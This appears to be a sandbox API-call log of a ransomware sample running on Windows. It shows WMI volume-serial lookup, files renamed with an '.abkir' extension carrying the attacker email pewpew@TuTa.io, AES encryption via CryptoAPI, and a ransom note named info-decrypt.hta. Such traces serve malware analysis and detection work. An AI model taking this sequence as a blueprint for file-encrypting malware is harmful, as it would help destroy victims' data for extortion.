WbemLocator:IUnknown:QueryInterface (in: This=0x60248d8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0209.570] WbemLocator:IClassFactory:CreateInstance (in: This=0x60248d8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x60274e0) returned 0x0 [0209.570] WbemLocator:IUnknown:Release (This=0x60248d8) returned 0x0 [0209.570] WbemLocator:IUnknown:QueryInterface (in: This=0x60274e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x60274e0) returned 0x0 [0209.570] WbemLocator:IUnknown:QueryInterface (in: This=0x60274e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0209.570] WbemLocator:IUnknown:AddRef (This=0x60274e0) returned 0x3 [0209.571] WbemLocator:IUnknown:QueryInterface (in: This=0x60274e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0209.571] WbemLocator:IUnknown:QueryInterface (in: This=0x60274e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0209.571] WbemLocator:IUnknown:QueryInterface (in: This=0x60274e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0209.571] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0209.571] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0209.571] WbemLocator:IUnknown:QueryInterface (in: This=0x60274e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0209.571] WbemLocator:IUnknown:Release (This=0x60274e0) returned 0x2 [0209.571] WbemLocator:IUnknown:Release (This=0x60274e0) returned 0x1 [0209.571] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0209.571] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0209.571] WbemLocator:IUnknown:QueryInterface (in: This=0x60274e0, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x60274e0) returned 0x0 [0209.571] WbemLocator:IUnknown:AddRef (This=0x60274e0) returned 0x3 [0209.571] WbemLocator:IUnknown:Release (This=0x60274e0) returned 0x2 [0209.571] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029d50, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0209.571] WbemDefPath:IWbemPath:GetText (in: This=0x6029d50, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0209.571] WbemDefPath:IWbemPath:GetText (in: This=0x6029d50, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0209.571] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x60274f0) returned 0x0 [0209.571] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60274f0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x60335dc) returned 0x0 [0209.966] WbemLocator:IUnknown:QueryInterface (in: This=0x60335dc, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5b134) returned 0x0 [0209.966] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b134, pProxy=0x60335dc, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0209.966] WbemLocator:IUnknown:Release (This=0xb5b134) returned 0x1 [0209.966] WbemLocator:IUnknown:QueryInterface (in: This=0x60335dc, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5b154) returned 0x0 [0209.967] WbemLocator:IUnknown:QueryInterface (in: This=0x60335dc, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5b134) returned 0x0 [0209.967] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b134, pProxy=0x60335dc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0209.967] WbemLocator:IUnknown:Release (This=0xb5b134) returned 0x2 [0209.967] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x1 [0209.967] CoTaskMemFree (pv=0xbd4a38) [0209.967] WbemLocator:IUnknown:Release (This=0x60274f0) returned 0x0 [0209.967] WbemLocator:IUnknown:QueryInterface (in: This=0x60335dc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5b154) returned 0x0 [0209.968] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0209.968] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0209.969] WbemLocator:IUnknown:AddRef (This=0xb5b154) returned 0x3 [0209.969] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0209.969] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0209.970] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5b0b4) returned 0x0 [0209.970] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b0b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0209.970] WbemLocator:IUnknown:Release (This=0xb5b0b4) returned 0x3 [0209.970] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0209.970] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0209.970] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5b13c) returned 0x0 [0209.970] WbemLocator:IRpcOptions:Query (in: This=0xb5b13c, pPrx=0xb5b154, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0209.970] WbemLocator:IUnknown:Release (This=0xb5b13c) returned 0x3 [0209.970] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x2 [0209.970] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0209.970] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0209.970] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x60335dc) returned 0x0 [0209.970] WbemLocator:IUnknown:AddRef (This=0x60335dc) returned 0x4 [0209.971] WbemLocator:IUnknown:Release (This=0x60335dc) returned 0x3 [0209.971] WbemLocator:IUnknown:Release (This=0x60335dc) returned 0x2 [0209.971] SysStringLen (param_1=0x0) returned 0x0 [0209.971] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f10, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0209.971] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0209.971] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.971] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0209.971] WbemLocator:IUnknown:AddRef (This=0xb5b154) returned 0x3 [0209.971] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5b154) returned 0x0 [0209.971] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x3 [0209.971] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x2 [0209.971] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0209.971] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.971] IWbemServices:GetObject (in: This=0x60335dc, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x60287e0, ppCallResult=0x0) returned 0x0 [0210.075] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029d50, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0210.075] WbemDefPath:IWbemPath:GetText (in: This=0x6029d50, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0210.075] WbemDefPath:IWbemPath:GetText (in: This=0x6029d50, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0210.075] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3689de4*=0, plFlavor=0x3689de8*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3689de4*=8, plFlavor=0x3689de8*=0) returned 0x0 [0210.075] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.075] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.075] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3689de4*=8, plFlavor=0x3689de8*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3689de4*=8, plFlavor=0x3689de8*=0) returned 0x0 [0210.075] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.075] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.075] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm", lpFilePart=0x0) returned 0x36 [0210.075] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x59 [0210.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0210.075] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmeukr.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x3692b660, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0210.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0210.076] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmeukr.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeUKR.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmeukr.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0210.076] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm", lpFilePart=0x0) returned 0x34 [0210.076] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0210.077] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0210.077] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0210.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0210.077] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm", lpFilePart=0x0) returned 0x34 [0210.077] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0210.077] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\vigtigt.htm"), fInfoLevelId=0x0, lpFileInformation=0x368a318 | out: lpFileInformation=0x368a318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41c1)) returned 1 [0210.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0210.077] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm", lpFilePart=0x0) returned 0x34 [0210.077] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0210.077] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\vigtigt.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0210.077] GetFileType (hFile=0x320) returned 0x1 [0210.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0210.078] GetFileType (hFile=0x320) returned 0x1 [0210.078] GetFileSize (in: hFile=0x320, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x41c1 [0210.078] ReadFile (in: hFile=0x320, lpBuffer=0x36d5c58, nNumberOfBytesToRead=0x41c1, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x36d5c58*, lpNumberOfBytesRead=0x8f6eedc*=0x41c1, lpOverlapped=0x0) returned 1 [0210.631] CloseHandle (hObject=0x320) returned 1 [0210.631] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0xbdfbf0) returned 1 [0210.633] CryptGenRandom (in: hProv=0xbdfbf0, dwLen=0x10, pbBuffer=0x379817c | out: pbBuffer=0x379817c) returned 1 [0210.902] CryptImportKey (in: hProv=0xbdfbf0, pbData=0x36a4c48, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7f110) returned 1 [0210.902] CryptContextAddRef (hProv=0xbdfbf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0210.902] CryptContextAddRef (hProv=0xbdfbf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0210.902] CryptDuplicateKey (in: hKey=0xb7f110, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7f250) returned 1 [0210.903] CryptContextAddRef (hProv=0xbdfbf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0210.903] CryptSetKeyParam (hKey=0xb7f250, dwParam=0x4, pbData=0x36a4d28*=0x1, dwFlags=0x0) returned 1 [0210.903] CryptSetKeyParam (hKey=0xb7f250, dwParam=0x1, pbData=0x36a4cf4, dwFlags=0x0) returned 1 [0210.903] CryptEncrypt (in: hKey=0xb7f250, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36a4d38*, pdwDataLen=0x8f6eea8*=0x41d0, dwBufLen=0x41d0 | out: pbData=0x36a4d38*, pdwDataLen=0x8f6eea8*=0x41d0) returned 1 [0210.903] CryptEncrypt (in: hKey=0xb7f250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36a8f2c*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x36a8f2c*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0210.909] CryptDestroyKey (hKey=0xb7f110) returned 1 [0210.909] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0210.909] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0210.910] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm", lpFilePart=0x0) returned 0x34 [0210.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0210.910] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Vigtigt.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\vigtigt.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0210.911] GetFileType (hFile=0x32c) returned 0x1 [0210.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0210.912] GetFileType (hFile=0x32c) returned 0x1 [0210.912] WriteFile (in: hFile=0x32c, lpBuffer=0x36a952c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x36a952c*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0210.912] CloseHandle (hObject=0x32c) returned 1 [0210.913] CoTaskMemAlloc (cb=0x20c) returned 0x66cdfc8 [0210.913] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66cdfc8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0210.913] CoTaskMemFree (pv=0x66cdfc8) [0210.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0210.913] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0210.914] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0210.914] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0210.914] IUnknown:Release (This=0xb51e34) returned 0x1 [0210.915] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x6027500) returned 0x0 